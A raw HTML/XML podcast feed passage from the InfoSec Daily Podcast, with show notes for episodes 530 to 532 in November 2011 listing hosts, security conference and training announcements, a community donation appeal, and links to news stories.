	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-532-live-from-securityzone-2011/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3205/0/infosec-daily-podcast-episode-532.mp3" length="20163540" type="audio/mpeg" />
		<itunes:duration>0:41:57</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 532 for November 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and lov[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 532 for November 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes &#38; Dan Houser (@1cissp on twitter)
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 531 &#8211; Weekend Wrap-up with Dr. Bonez</title>
		<link>http://www.isdpodcast.com/episode-531-weekend-wrap-up-with-dr-bonez</link>
		<comments>http://www.isdpodcast.com/episode-531-weekend-wrap-up-with-dr-bonez#comments</comments>
		<pubDate>Sat, 26 Nov 2011 18:44:07 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3198</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 531 for November 26, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik. Guests: Gambit, Terry McCorkle, and Billy Rios. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span>InfoSec Daily Podcast Episode 531 for November 26, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.</span></p>
<div style="background-color: transparent">
	<span>Guests: Gambit, Terry McCorkle, and Billy Rios.</span></p>
<p>	<span>Announcements:</span><br />
	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span>Vote For Wim Remes</span><br />
	<span>When: Starts November 16, 2011</span><br />
	<span>Where: ISC2</span><br />
	<span>Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span>http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span>SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span>When: Starts November 30, 2011</span><br />
	<span>Where: Atlanta, GA</span><br />
	<span>Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>When: Starts January 24, 2012</span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>Where: Atlanta, GA</span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span>ShmooCon 2012</span><br />
	<span>When: January 27th-29th, 2012</span><br />
	<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p>	<span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span>Stories:</span><br />
	<span>Source:</span><span> </span></p>
<p>	<a href="http://www.irongeek.com/i.php?page=videos/derbycon1/mccorkle-and-rios-100-bugs-in-100-days-an-analysis-of-ics-scada-software"><span>http://www.irongeek.com/i.php?page=videos/derbycon1/mccorkle-and-rios-100-bugs-in-100-days-an-analysis-of-ics-scada-software</span></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-531-weekend-wrap-up-with-dr-bonez/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3198/0/infosec-daily-podcast-episode-531.mp3" length="20659686" type="audio/mpeg" />
		<itunes:duration>0:42:35</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 531 for November 26, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.

	Guests: Gambit, Terry McCorkle, and Billy Rios.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smit[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 531 for November 26, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.

	Guests: Gambit, Terry McCorkle, and Billy Rios.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: 
	http://www.irongeek.com/i.php?page=videos/derbycon1/mccorkle-and-rios-100-bugs-in-100-days-an-analysis-of-ics-scada-software</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 530 &#8211; All Your DNA&#8230;, SCADA != Hacked, Amazon Shipping, Xbox Live Hacked?, Facebook Phone, Mega DDoS and SOPA FAQ!</title>
		<link>http://www.isdpodcast.com/episode-530-all-your-dna-scada-hacked-amazon-shipping-xbox-live-hacked-facebook-phone-mega-ddos-and-sopa-faq</link>
		<comments>http://www.isdpodcast.com/episode-530-all-your-dna-scada-hacked-amazon-shipping-xbox-live-hacked-facebook-phone-mega-ddos-and-sopa-faq#comments</comments>
		<pubDate>Thu, 24 Nov 2011 02:08:22 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3192</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 530 for November 23, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma. Announcements: No Show on Thursday (11/24) or Friday (11/25). &#160; In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 530 for November 23, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No Show on Thursday (11/24) or Friday (11/25). &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &nbsp;Dr. Bonez will have his weekend show on 11/26 9PM EST. &nbsp;The normal show will return on 11/28.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes &amp; Dan Houser (@1cissp on twitter)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://moneyland.time.com/2011/10/27/now-credit-card-companies-want-your-dna/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://moneyland.time.com/2011/10/27/now-credit-card-companies-want-your-dna/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All Your DNA Are Belong To Us</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;According to a Visa patent application published in April, the company sees potential to use a wide array of personal details to create profiles that could be used for ad targeting well beyond shopping details. It describes the possibility of also using &ldquo;information from social network websites, information from credit bureaus, information from search engines, information about insurance claims, information from DNA databanks,&rdquo; and other sources.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">-thanks to Ciphersson for this story</span></p>
